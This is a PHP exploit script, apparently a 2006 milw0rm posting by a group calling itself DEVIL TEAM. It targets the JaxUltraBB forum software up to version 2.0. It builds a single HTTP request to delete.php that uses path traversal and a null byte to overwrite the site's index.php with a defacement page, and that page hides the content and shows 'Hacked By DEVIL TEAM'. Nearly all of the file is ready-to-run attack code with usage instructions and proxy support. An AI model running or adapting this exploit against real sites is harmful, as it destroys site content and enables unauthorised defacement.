deface.sh

1. #!/usr/bin/php -q -d short_open_tag=on
2. <?
3. print '
4. ::::::::: :::::::::: ::: ::: ::::::::::: :::
5. :+: :+: :+: :+: :+: :+: :+:
6. +:+ +:+ +:+ +:+ +:+ +:+ +:+
7. +#+ +:+ +#++:++# +#+ +:+ +#+ +#+
8. +#+ +#+ +#+ +#+ +#+ +#+ +#+
9. #+# #+# #+# #+#+#+# #+# #+#
10. ######### ########## ### ########### ##########
11. ::::::::::: :::::::::: ::: :::: ::::
12. :+: :+: :+: :+: +:+:+: :+:+:+
13. +:+ +:+ +:+ +:+ +:+ +:+:+ +:+
14. +#+ +#++:++# +#++:++#++: +#+ +:+ +#+
15. +#+ +#+ +#+ +#+ +#+ +#+
16. #+# #+# #+# #+# #+# #+#
17. ### ########## ### ### ### ###
18.  
19. - - [DEVIL TEAM THE BEST POLISH TEAM] - -
20.  
21. JaxUltraBB <= 2.0 (delete.php) Defaced Exploit
22. [Script name: JaxUltraBB 2.0
23. [Script site: http://heanet.dl.sourceforge.net/sourceforge/jubb/jubb_2.0.zip
24. Find by: Kacper (a.k.a Rahim)
25. (c)od3d by Kacper
26. DEVIL TEAM IRC: 72.20.18.6:6667 #devilteam
27. Contact: kacper1964@yahoo.pl
28. or
29. http://www.rahim.webd.pl/
30. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
31. Greetings DragonHeart and all DEVIL TEAM Patriots :)
32. - Leito & Leon
33. TomZen, Gelo, Ramzes, DMX, Ci2u, Larry, @steriod, Drzewko., CrazzyIwan, Rammstein
34. Adam., Kicaj., DeathSpeed, Arkadius, Michas, pepi, nukedclx, SkD, MXZ, sysios,
35. mIvus, nukedclx, SkD, wacky
36. ';
37.  
38. if ($argc<3) {
39. print_r('
40. -----------------------------------------------------------------------------
41. Usage: php '.$argv[0].' host path OPTIONS
42. host: target server (ip/hostname)
43. path: JaxUltraBB path
44. Options:
45. -p[port]: specify a port other than 80
46. -P[ip:port]: specify a proxy
47. Example:
48. php '.$argv[0].' localhost /JaxUltraBB/
49. php '.$argv[0].' 2.2.2.2 /JaxUltraBB/ -P1.1.1.1:80
50. -----------------------------------------------------------------------------
51. ');
52. die;
53. }
54.  
55. error_reporting(0);
56. ini_set("max_execution_time",0);
57. ini_set("default_socket_timeout",5);
58.  
59. function quick_dump($string)
60. {
61. $result='';$exa='';$cont=0;
62. for ($i=0; $i<=strlen($string)-1; $i++)
63. {
64. if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
65. {$result.=" .";}
66. else
67. {$result.=" ".$string[$i];}
68. if (strlen(dechex(ord($string[$i])))==2)
69. {$exa.=" ".dechex(ord($string[$i]));}
70. else
71. {$exa.=" 0".dechex(ord($string[$i]));}
72. $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
73. }
74. return $exa."\r\n".$result;
75. }
76. $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
77. function sendpacketii($packet)
78. {
79. global $proxy, $host, $port, $html, $proxy_regex;
80. if ($proxy=='') {
81. $ock=fsockopen(gethostbyname($host),$port);
82. if (!$ock) {
83. echo 'No response from '.$host.':'.$port; die;
84. }
85. }
86. else {
87. $c = preg_match($proxy_regex,$proxy);
88. if (!$c) {
89. echo 'Not a valid proxy...';die;
90. }
91. $parts=explode(':',$proxy);
92. echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
93. $ock=fsockopen($parts[0],$parts[1]);
94. if (!$ock) {
95. echo 'No response from proxy...';die;
96. }
97. }
98. fputs($ock,$packet);
99. if ($proxy=='') {
100. $html='';
101. while (!feof($ock)) {
102. $html.=fgets($ock);
103. }
104. }
105. else {
106. $html='';
107. while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
108. $html.=fread($ock,1);
109. }
110. }
111. fclose($ock);
112. }
113. function make_seed()
114. {
115. list($usec, $sec) = explode(' ', microtime());
116. return (float) $sec + ((float) $usec * 100000);
117. }
118.  
119. $host=$argv[1];
120. $path=$argv[2];
121.  
122. $port=80;
123. $proxy="";
124. for ($i=3; $i<$argc; $i++){
125. $temp=$argv[$i][0].$argv[$i][1];
126. if (($temp<>"-p") and ($temp<>"-P"))
127. if ($temp=="-p")
128. {
129. $port=str_replace("-p","",$argv[$i]);
130. }
131. if ($temp=="-P")
132. {
133. $proxy=str_replace("-P","",$argv[$i]);
134. }
135. }
136. if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
137.  
138. $hauru='<STYLE =text/css>BODY {
139. SCROLLBAR-FACE-COLOR: #000000; SCROLLBAR-HIGHLIGHT-COLOR: #000000; SCROLLBAR-SHADOW-COLOR: darkgray; SCROLLBAR-3DLIGHT-COLOR: #eeeeee; SCROLLBAR-ARROW-COLOR: #000000; SCROLLBAR-TRACK-COLOR: gray; SCROLLBAR-DARKSHADOW-COLOR: #000000
140. }
141. A:link {
142. COLOR: darkblue; TEXT-DECORATION: none
143. }
144. A:visited {
145. COLOR: #000088; TEXT-DECORATION: none
146. }
147. A:hover {
148. COLOR: #000000
149. }
150. body, td, th {
151. color: #000000;
152. }
153. table, p, td, tr
154. {
155. visibility:hidden;
156. }
157. body {
158. background-color: #000000;
159. background-image: url("http://img89.imageshack.us/img89/5125/hackpo6.jpg");
160. }
161. </STYLE>
162. <script language="JavaScript">
163. var left="{";
164. var right="}";
165. var msg=" - - Hacked By DEVIL TEAM .:We Ownz You!:. - - ";
166. var speed=200;
167. function scroll_title() {
168. document.title=left+msg+right;
169. msg=msg.substring(1,msg.length)+msg.charAt(0);
170. setTimeout("scroll_title()",speed);
171. }
172. scroll_title();
173. </script>';
174.  
175.  
176. $packet ="GET ".$p."delete.php?modtype=%3Cimg%20src=img/admin.jpg%3E&forum=../index.php%00&contents=".$hauru." HTTP/1.0\r\n";
177. $packet.="Host: ".$host."\r\n";
178. $packet.="Connection: Close\r\n\r\n";
179. sendpacketii($packet);
180.  
181. echo "Site defaced ;] look to index.php";
182. echo "Go to DEVIL TEAM IRC: 72.20.18.6:6667 #devilteam";
183. ?>
184.  
185. # milw0rm.com [2006-10-22]